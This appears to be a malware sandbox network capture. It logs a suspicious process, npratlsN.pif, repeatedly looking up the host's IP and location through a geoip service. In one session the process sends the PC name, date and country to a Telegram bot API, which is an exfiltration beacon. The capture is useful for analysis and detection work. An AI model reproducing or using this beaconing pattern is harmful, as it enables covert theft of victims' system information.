                                                                                                                                                                        2025-01-06 06:53:34 UTC855INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Mon, 06 Jan 2025 06:53:34 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 362
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Age: 1461203
                                                                                                                                                                        Cache-Control: max-age=31536000
                                                                                                                                                                        cf-cache-status: HIT
                                                                                                                                                                        last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FLa%2BjgNalk3ow1RKdiEeDRes7gM61tZyEhPnPKyE0rAPXtVwYza0tR2q4ZbDmAUcm9BfV%2F3Au2vetdoQn9WOzWezWlYa27AbjcB0jsx1zkukedt9HWAp9lEb13HFQCjxdSWzO%2BkC"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                        CF-RAY: 8fd9cab26cd4423d-EWR
                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1894&min_rtt=1888&rtt_var=721&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1505154&cwnd=186&unsent_bytes=0&cid=aa4733f712b1e7fe&ts=159&x=0"
                                                                                                                                                                        2025-01-06 06:53:34 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                                        Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        7192.168.2.449768188.114.96.34438112C:\Users\Public\Libraries\npratlsN.pif
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2025-01-06 06:53:36 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                                        Host: reallyfreegeoip.org
                                                                                                                                                                        2025-01-06 06:53:36 UTC861INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Mon, 06 Jan 2025 06:53:36 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 362
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Age: 1461205
                                                                                                                                                                        Cache-Control: max-age=31536000
                                                                                                                                                                        cf-cache-status: HIT
                                                                                                                                                                        last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=H6O8uLYD1aAqdbYnSxo4UtY0wxFXkg1E1f0FRiYq8RI2eh7Enj%2BD8Mgw%2ByIJ7V8f0v%2BMP8cVAad9PXpfg3QbfHwPNg8%2BDXD28d2sF1yPrRFVvBy%2BUs%2BEmBbJNI7tjabNIKFrdxUP"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                        CF-RAY: 8fd9cac0986a42f2-EWR
                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1648&min_rtt=1609&rtt_var=631&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1814791&cwnd=222&unsent_bytes=0&cid=ff9f3a625036adb1&ts=152&x=0"
                                                                                                                                                                        2025-01-06 06:53:36 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                                        Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        8192.168.2.449771188.114.96.34438112C:\Users\Public\Libraries\npratlsN.pif
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2025-01-06 06:53:37 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                                        Host: reallyfreegeoip.org
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        2025-01-06 06:53:38 UTC859INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Mon, 06 Jan 2025 06:53:37 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 362
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Age: 1461207
                                                                                                                                                                        Cache-Control: max-age=31536000
                                                                                                                                                                        cf-cache-status: HIT
                                                                                                                                                                        last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=d36juYfaxaG8Wnd8zpJJNG%2F2PdjeB2iROJJcuIsSzvpwKcp0S7X61tPRMm47%2FMNSDYiikxrnj6MHNNqetAJjy2IVyONcQMqhO5%2FNkVySb%2BJJww8SIfsJn8r%2BmQCiD3GsBkDrJQaH"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                        CF-RAY: 8fd9cac84d147d0b-EWR
                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=2004&min_rtt=1998&rtt_var=762&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1424390&cwnd=227&unsent_bytes=0&cid=ebb389e9c7a3b453&ts=160&x=0"
                                                                                                                                                                        2025-01-06 06:53:38 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                                        Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        9192.168.2.449773188.114.96.34433980C:\Users\Public\Libraries\npratlsN.pif
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2025-01-06 06:53:38 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                                        Host: reallyfreegeoip.org
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        2025-01-06 06:53:38 UTC857INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Mon, 06 Jan 2025 06:53:38 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 362
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Age: 1461207
                                                                                                                                                                        Cache-Control: max-age=31536000
                                                                                                                                                                        cf-cache-status: HIT
                                                                                                                                                                        last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Y1i5c9y2mfMExnV9287jAew7u5iuQxtZII2F2dycHDz2UlXHFKCDcW7%2F6RzEbSgrDbfDbzK4oXzn4%2FhmjfJjrAAsSPArtQ3ejZafT21efs%2FfNU0llLHyn9GS%2BBK1ArV47uY1dUGo"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                        CF-RAY: 8fd9cacd8f39424f-EWR
                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1736&min_rtt=1730&rtt_var=661&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1639528&cwnd=234&unsent_bytes=0&cid=6b7203a770df18b5&ts=180&x=0"
                                                                                                                                                                        2025-01-06 06:53:38 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                                        Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        10192.168.2.449775188.114.96.34438112C:\Users\Public\Libraries\npratlsN.pif
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2025-01-06 06:53:39 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                                        Host: reallyfreegeoip.org
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        2025-01-06 06:53:39 UTC851INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Mon, 06 Jan 2025 06:53:39 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 362
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Age: 1461208
                                                                                                                                                                        Cache-Control: max-age=31536000
                                                                                                                                                                        cf-cache-status: HIT
                                                                                                                                                                        last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=P6fgVBPqMQEhqCvrwKfoHksfzwmNK7gJcZQmn0fZPRE3DERGUlTQj3p2miIGNslgjzzrjkk48gdICFMgdLbC016V5MJ4kV1e7P66juJN0wsSrohQxHHYUtkyHgUFbfrxbaD6BsB%2B"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                        CF-RAY: 8fd9cad20bda422e-EWR
                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1699&min_rtt=1692&rtt_var=649&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1668571&cwnd=252&unsent_bytes=0&cid=737be7d23c28f0bc&ts=141&x=0"
                                                                                                                                                                        2025-01-06 06:53:39 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                                        Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        11192.168.2.449776188.114.96.34433980C:\Users\Public\Libraries\npratlsN.pif
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2025-01-06 06:53:39 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                                        Host: reallyfreegeoip.org
                                                                                                                                                                        2025-01-06 06:53:39 UTC857INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Mon, 06 Jan 2025 06:53:39 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 362
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Age: 1461208
                                                                                                                                                                        Cache-Control: max-age=31536000
                                                                                                                                                                        cf-cache-status: HIT
                                                                                                                                                                        last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7mnJHQqXwjES6%2FA0d%2Fc6G6k9mr4DS3S3quAZdFwPDkRoumqUbpspoNpRV2qfJargke6%2BobGlSCiXLhIsy3NAuKDhitYm1sbg6cs5L0ks4A5qlcrZniyTmbt4mDH22OG%2FGL1BoXFQ"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                        CF-RAY: 8fd9cad2ab0e4216-EWR
                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1705&min_rtt=1703&rtt_var=644&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1691772&cwnd=250&unsent_bytes=0&cid=e7307c3a6d7d319f&ts=145&x=0"
                                                                                                                                                                        2025-01-06 06:53:39 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                                        Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        12192.168.2.449778149.154.167.2204438112C:\Users\Public\Libraries\npratlsN.pif
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2025-01-06 06:53:40 UTC349OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:536720%0D%0ADate%20and%20Time:%2006/01/2025%20/%2015:16:51%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20536720%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                                                                                                                                        Host: api.telegram.org
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        2025-01-06 06:53:40 UTC344INHTTP/1.1 404 Not Found
                                                                                                                                                                        Server: nginx/1.18.0
                                                                                                                                                                        Date: Mon, 06 Jan 2025 06:53:40 GMT
                                                                                                                                                                        Content-Type: application/json
                                                                                                                                                                        Content-Length: 55
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                                                        2025-01-06 06:53:40 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                                                                                                                                        Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        13192.168.2.449780188.114.96.34433980C:\Users\Public\Libraries\npratlsN.pif
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2025-01-06 06:53:40 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                                        Host: reallyfreegeoip.org
                                                                                                                                                                        2025-01-06 06:53:40 UTC865INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Mon, 06 Jan 2025 06:53:40 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 362
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Age: 1461210
                                                                                                                                                                        Cache-Control: max-age=31536000
                                                                                                                                                                        cf-cache-status: HIT
                                                                                                                                                                        last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=61Of2rua6GdrRD8ohyBrjeNP149AYueo2iYXwWpYCdVYRsIdBLI5EMb9y7VCTgEIXk%2BmegObOG%2BUuCgG%2BEFZI%2BVMmsMOP9vcz26aX%2F%2BOpN%2BnkQ4FV%2BIfCfhtGSPeeU4oKb12avS0"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                        CF-RAY: 8fd9cada5f0bc332-EWR
                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1469&min_rtt=1459&rtt_var=568&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1891191&cwnd=180&unsent_bytes=0&cid=7626122625b43608&ts=154&x=0"
                                                                                                                                                                        2025-01-06 06:53:40 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                                        Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        14192.168.2.449783188.114.96.34433980C:\Users\Public\Libraries\npratlsN.pif
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2025-01-06 06:53:42 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                                        Host: reallyfreegeoip.org
                                                                                                                                                                        2025-01-06 06:53:42 UTC861INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Mon, 06 Jan 2025 06:53:42 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 362
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Age: 1461211
                                                                                                                                                                        Cache-Control: max-age=31536000
                                                                                                                                                                        cf-cache-status: HIT
                                                                                                                                                                        last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kW0vWumFHOoHhaq96r2kTJGxv4E5ThgIWXECd%2Fyq1Oms24kmtmA%2BZ%2FiAkOkRt5eV%2BcZ1D7LFWLx%2Fb38vBgCuk4Bihz8IKHq%2BV0gpv4wN0ud151jFU33haZL7Obe0Ux7OBxcmz4aI"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                        CF-RAY: 8fd9cae59bd6429d-EWR
                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1701&min_rtt=1693&rtt_var=652&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1658148&cwnd=246&unsent_bytes=0&cid=9c7ff96607af2e41&ts=156&x=0"
                                                                                                                                                                        2025-01-06 06:53:42 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                                        Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        15192.168.2.449788188.114.96.34433980C:\Users\Public\Libraries\npratlsN.pif
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2025-01-06 06:53:45 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                                        Host: reallyfreegeoip.org
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        2025-01-06 06:53:45 UTC863INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Mon, 06 Jan 2025 06:53:45 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 362
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Age: 1461214
                                                                                                                                                                        Cache-Control: max-age=31536000
                                                                                                                                                                        cf-cache-status: HIT
